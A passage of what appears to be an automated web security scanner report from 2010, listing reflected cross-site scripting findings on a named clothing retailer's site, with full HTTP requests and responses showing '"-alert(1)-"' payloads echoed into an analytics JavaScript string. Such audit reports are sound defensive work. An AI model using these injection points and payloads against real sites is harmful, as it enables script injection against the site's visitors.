GET /checkout/carte3f96"-alert(1)-"360bb29e453/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:18:50 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=28opuu1bvek2saq3nnrtc74pk1; expires=Tue, 09-Nov-2010 17:18:50 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29349
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/checkout/carte3f96"-alert(1)-"360bb29e453/"); //]]> ...[SNIP]...
1.35. http://www.fredperry.com/checkout/cart/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/checkout/cart/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aaeb2"-alert(1)-"48ab0bad009 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /checkout/cart/?aaeb2"-alert(1)-"48ab0bad009=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd4e5"-alert(1)-"2ac73757ecd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /contactsbd4e5"-alert(1)-"2ac73757ecd/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:18:10 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=jh0vo27j1jvpb68t8sdl5qirv6; expires=Tue, 09-Nov-2010 17:18:10 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29344
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/contactsbd4e5"-alert(1)-"2ac73757ecd/"); //]]> ...[SNIP]...
1.37. http://www.fredperry.com/contacts/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/contacts/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 464b0"-alert(1)-"4c1edb0da7a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /contacts/?464b0"-alert(1)-"4c1edb0da7a=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41986"-alert(1)-"bad21956557 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /customercare41986"-alert(1)-"bad21956557/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:16:52 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=34gef0dea5ctpbtgku4qtilqc2; expires=Tue, 09-Nov-2010 17:16:52 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29348
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/customercare41986"-alert(1)-"bad21956557/"); //]]> ...[SNIP]...
1.39. http://www.fredperry.com/customercare/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/customercare/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 900a1"-alert(1)-"6e32b2c374e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /customercare/?900a1"-alert(1)-"6e32b2c374e=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75a54"-alert(1)-"6789d05419e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /customercare75a54"-alert(1)-"6789d05419e/delivery/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:17:00 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=34tn4624mcd4thnbsvokvo7nf0; expires=Tue, 09-Nov-2010 17:17:00 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29357
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/customercare75a54"-alert(1)-"6789d05419e/delivery/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3eacb"-alert(1)-"257fda257ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /customercare/delivery3eacb"-alert(1)-"257fda257ac/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:17:19 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=41nrhbjdpjk7dkmn0nohfukmf3; expires=Tue, 09-Nov-2010 17:17:20 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29357
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/customercare/delivery3eacb"-alert(1)-"257fda257ac/"); //]]> ...[SNIP]...
1.42. http://www.fredperry.com/customercare/delivery/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/customercare/delivery/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd5f1"-alert(1)-"ada1d66d6a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /customercare/delivery/?dd5f1"-alert(1)-"ada1d66d6a4=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c11fc"-alert(1)-"e04e37a7eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /customercarec11fc"-alert(1)-"e04e37a7eb/deliverylate/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:17:13 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=l4erk5aec401u2f60cqm0060o6; expires=Tue, 09-Nov-2010 17:17:13 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29360
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/customercarec11fc"-alert(1)-"e04e37a7eb/deliverylate/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3ddd"-alert(1)-"ca7404da0f0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /customercare/deliverylatee3ddd"-alert(1)-"ca7404da0f0/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:17:38 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=m3t49fuevbtdncf9jjst5c8de7; expires=Tue, 09-Nov-2010 17:17:38 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29361
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/customercare/deliverylatee3ddd"-alert(1)-"ca7404da0f0/"); //]]> ...[SNIP]...
1.45. http://www.fredperry.com/customercare/deliverylate/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/customercare/deliverylate/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95c50"-alert(1)-"6baf5d54777 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /customercare/deliverylate/?95c50"-alert(1)-"6baf5d54777=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Late De ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/customercare/deliverylate/?95c50"-alert(1)-"6baf5d54777=1"); //]]> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dae5a"-alert(1)-"40f1ed9aa59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /customercaredae5a"-alert(1)-"40f1ed9aa59/faq/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:21:08 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=jdmst23utqklf1vmkl2k49ph12; expires=Tue, 09-Nov-2010 17:21:08 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29352
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/customercaredae5a"-alert(1)-"40f1ed9aa59/faq/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e6e4"-alert(1)-"7c11dc98e25 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /customercare/faq5e6e4"-alert(1)-"7c11dc98e25/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:21:38 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=9l0k5hcfbprm6okg0o12cfko46; expires=Tue, 09-Nov-2010 17:21:38 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29352
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/customercare/faq5e6e4"-alert(1)-"7c11dc98e25/"); //]]> ...[SNIP]...
1.48. http://www.fredperry.com/customercare/faq/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/customercare/faq/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c9f6"-alert(1)-"ff55126c3f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /customercare/faq/?8c9f6"-alert(1)-"ff55126c3f8=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c1d2"-alert(1)-"42fbc0107c9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /customercare7c1d2"-alert(1)-"42fbc0107c9/information/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:18:22 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=kiqa43s52v9mfokqjcgequat17; expires=Tue, 09-Nov-2010 17:18:22 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29360
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/customercare7c1d2"-alert(1)-"42fbc0107c9/information/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 477f5"-alert(1)-"ef99901e51e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /customercare/information477f5"-alert(1)-"ef99901e51e/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:18:44 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=r1u2itv5omnem2c1mrj2n6ief5; expires=Tue, 09-Nov-2010 17:18:44 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29360
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/customercare/information477f5"-alert(1)-"ef99901e51e/"); //]]> ...[SNIP]...
1.51. http://www.fredperry.com/customercare/information/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/customercare/information/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24020"-alert(1)-"c2e99d599f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
